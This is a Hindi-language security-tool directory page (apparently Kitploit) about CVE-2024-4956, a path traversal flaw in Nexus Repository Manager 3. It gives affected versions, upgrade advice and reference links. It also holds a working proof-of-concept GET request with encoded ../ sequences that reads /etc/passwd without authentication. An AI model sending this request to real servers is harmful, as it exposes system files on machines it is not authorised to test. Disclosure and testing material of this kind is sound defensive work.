Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4956 — नेक्सस रिपॉजिटरी 3 में अनधिकृत पथ ट्रैवर्सल | Kitploit
उपकरण/GitHubGitHub/gmh5225/cve-2024-4956
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubgmh5225/cve-2024-4956

CVE-2024-4956

नेक्सस रिपॉजिटरी 3 में अनधिकृत पथ ट्रैवर्सल

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4956 - Nexus Repository Manager 3 में अप्रमाणित पथ ट्रैवर्सल

Nexus Repository Manager एक रिपॉजिटरी प्रबंधक है जो विकास के लिए आवश्यक आर्टिफैक्ट्स को व्यवस्थित, संग्रहीत और वितरित करता है।

Nexus Repository 3 में, संस्करण 3.68.1 से पहले के संस्करणों में एक पथ ट्रैवर्सल भेद्यता खोजी गई है। यह भेद्यता एक हमलावर को बिना किसी प्रमाणीकरण के Nexus Repository एप्लिकेशन के दायरे से बाहर सिस्टम फ़ाइलों को डाउनलोड करने के लिए URL बनाने की अनुमति देती है। यह एक महत्वपूर्ण जोखिम उत्पन्न करता है क्योंकि यह संवेदनशील सिस्टम फ़ाइलों को उजागर कर सकता है और संभावित रूप से उस वातावरण की सुरक्षा से समझौता कर सकता है जहाँ Nexus Repository स्थापित है।

इस भेद्यता को कम करने के लिए जितनी जल्दी हो सके Nexus Repository को संस्करण 3.68.1 या बाद में अपडेट करने की अनुशंसा की जाती है।

भेद्यता के बारे में अधिक जानकारी और तकनीकी विवरण के लिए, कृपया निम्नलिखित लिंक देखें:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

संवेदनशील संस्करण

यह भेद्यता Sonatype Nexus Repository Manager के संस्करण 3.0 से 3.68.0 को प्रभावित करती है।

शमन:

Nexus Repository को अपग्रेड करना इस भेद्यता को समाप्त करने के लिए अनुशंसित तरीका है। हालांकि, उन डिप्लॉयमेंट के लिए तत्काल शमन विकल्प उपलब्ध हैं जो तुरंत अपग्रेड नहीं कर सकते:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

प्रमाण अवधारणा (PoC)

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

उपरोक्त PoC के साथ, /etc/passwd फ़ाइल तक पहुँचते देखना संभव है:

Nuclei टेम्पलेट

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

टूल डाउनलोड करें